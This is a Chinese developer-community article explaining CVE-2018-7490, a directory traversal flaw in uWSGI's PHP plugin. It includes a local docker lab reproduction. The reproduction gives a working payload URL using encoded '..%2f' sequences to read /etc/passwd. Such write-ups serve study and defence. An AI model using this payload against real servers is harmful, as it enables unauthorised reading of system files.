备案控制台
开发者社区 开发与运维 文章 正文

CVE-2018-7490 uWSGI PHP目录穿越漏洞

2022-12-02 436
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: CVE-2018-7490 uWSGI PHP目录穿越漏洞

漏洞简介

uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言。

uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。

漏洞复现

运行存在漏洞的uWSGI服务器:

docker-compose up -d

运行完成后,访问http://your-ip:8080/即可看到phpinfo信息,说明uwsgi-php服务器已成功运行。

漏洞复现

http://127.0.0.1:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd

访问http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd,成功读取文件:

文章标签:
PHP
安全
关键词:
PHP目录
PHP漏洞
PHP目录漏洞
5q2a2sugf4ej6
目录
相关文章
贵哥的编程之路(热爱分享)
|
4天前
|
PHP
php案例 :显示目录信息
php案例 :显示目录信息
贵哥的编程之路(热爱分享)
22 0
php案例 :显示目录信息
桃李春风一杯酒
|
4天前
|
存储 缓存 PHP
【PHP开发专栏】PHP文件操作与目录管理
【4月更文挑战第30天】本文介绍了PHP中的文件操作和目录管理。内容涵盖文件的打开、关闭、读写、删除及状态检测,如`fopen`、`fclose`、`fread`、`fwrite`、`file_get_contents`等函数。此外,还涉及文件高级操作如锁定和指针操作。在目录管理方面,讲解了创建、删除目录及读取目录内容的函数,如`mkdir`、`rmdir`、`scandir`等。通过示例代码展示了如何在实践中应用这些函数。理解这些基础知识对处理文件系统相关问题至关重要。
桃李春风一杯酒
12 1
GG2020gg
|
4天前
|
运维 Linux Apache
LAMP架构调优(十)——Apache禁止指定目录PHP解析与错误页面优化
LAMP架构调优(十)——Apache禁止指定目录PHP解析与错误页面优化
GG2020gg
200 2
贵哥的编程之路(热爱分享)
|
4天前
|
PHP
php案例:创建日期时间目录
php案例:创建日期时间目录
贵哥的编程之路(热爱分享)
22 0
php案例:创建日期时间目录
贵哥的编程之路(热爱分享)
|
4天前
|
PHP
php案例:用代码的方式创建目录+文件+写入数据(都由你定)
php案例:用代码的方式创建目录+文件+写入数据(都由你定)
贵哥的编程之路(热爱分享)
33 0
php案例:用代码的方式创建目录+文件+写入数据(都由你定)
贵哥的编程之路(热爱分享)
|
4天前
|
PHP
php案例 往某个目录下创建文件并写入数据
php案例 往某个目录下创建文件并写入数据
贵哥的编程之路(热爱分享)
39 0
php案例 往某个目录下创建文件并写入数据
贵哥的编程之路(热爱分享)
|
4天前
|
PHP
php案例 批量删除某个目录下的文件
php案例 批量删除某个目录下的文件
贵哥的编程之路(热爱分享)
35 0
php案例 批量删除某个目录下的文件
贵哥的编程之路(热爱分享)
|
4天前
|
PHP
原生php实现遍历目录信息
原生php实现遍历目录信息
贵哥的编程之路(热爱分享)
28 0
原生php实现遍历目录信息
漏刻有时
|
10月前
|
PHP
php开发实战分析(4):php调用封装函数包含文件路径自适应不同目录的解决方案($_SERVER[‘DOCUMENT_ROOT‘]与__DIR__魔术常量)
php开发实战分析(4):php调用封装函数包含文件路径自适应不同目录的解决方案($_SERVER[‘DOCUMENT_ROOT‘]与__DIR__魔术常量)
漏刻有时
134 0
项目花园范德彪
|
9月前
|
关系型数据库 MySQL PHP
PHP注册、登陆、6套主页-带Thinkphp目录解析-【白嫖项目】
PHP注册、登陆、6套主页-带Thinkphp目录解析-【白嫖项目】 CSDN 转过来的,所以格式与内容有些许错误请见谅
项目花园范德彪
75 0

热门文章

最新文章

  • 1
    Serverless 应用引擎产品使用之在阿里函数计算中,Php环境,配置取消禁止函数exec如何解决
  • 2
    使用PHP实现动态代理IP的功能
  • 3
    Serverless 应用引擎操作报错合集之在阿里函数计算中,云函数怎么一直报错Function instance exited unexpectedly(code 1, message:operation not permitted) with start command 'php server.php '.如何解决
  • 4
    记录如何用php做一个网站访问计数器的方法
  • 5
    【PHP开发专栏】Xdebug在PHP调试中的应用
  • 6
    【PHP开发专栏】PHP事务处理与并发控制
  • 7
    【PHP开发专栏】PHP类的继承与多态实现
  • 8
    PHP 8.1版本发布:引领Web开发新潮流
  • 9
    2024一分钱网淘客联盟PHP网站源码
  • 10
    PHP 7.4新特性解析与实践
  • 1
    深入PHP内核:探索高性能异步编程
    23
  • 2
    阿里云OpenAPI RocketMQ 5.0的PHP收发消息文档
    63
  • 3
    PHP爬虫技术:利用simple_html_dom库分析汽车之家电动车参数
    31
  • 4
    深入理解PHP的命名空间和自动加载机制
    16
  • 5
    深入理解PHP中的命名空间和自动加载机制
    29
  • 6
    深入理解PHP的命名空间和自动加载机制
    31
  • 7
    PHP运算符
    22
  • 8
    PHP变量类型
    19
  • 9
    PHP对象和类
    22
  • 10
    PHP注释
    14

    • 相关课程

    更多
  • PHP进阶教程 - 由浅入深掌握面向对象开发 - 第二阶段
  • PHP完全自学手册文档教程
  • Linux Web服务器Nginx搭建与配置

    • 相关电子书

    更多
  • 阿里云栖开发者沙龙PHP技术专场-深入浅出网络编程与swoole内核-吴镇宇
  • PHP安全开发:从白帽角度做安全
  • PHP 2017.北京 全球开发者大会——高可用的PHP

    • 相关实验场景

    更多
  • 1分钟SAE部署PHP商城小程序
  • 10分钟Serverless部署PHP商城
    • 下一篇
    2024年阿里云免费云服务器及学生云服务器申请教程参考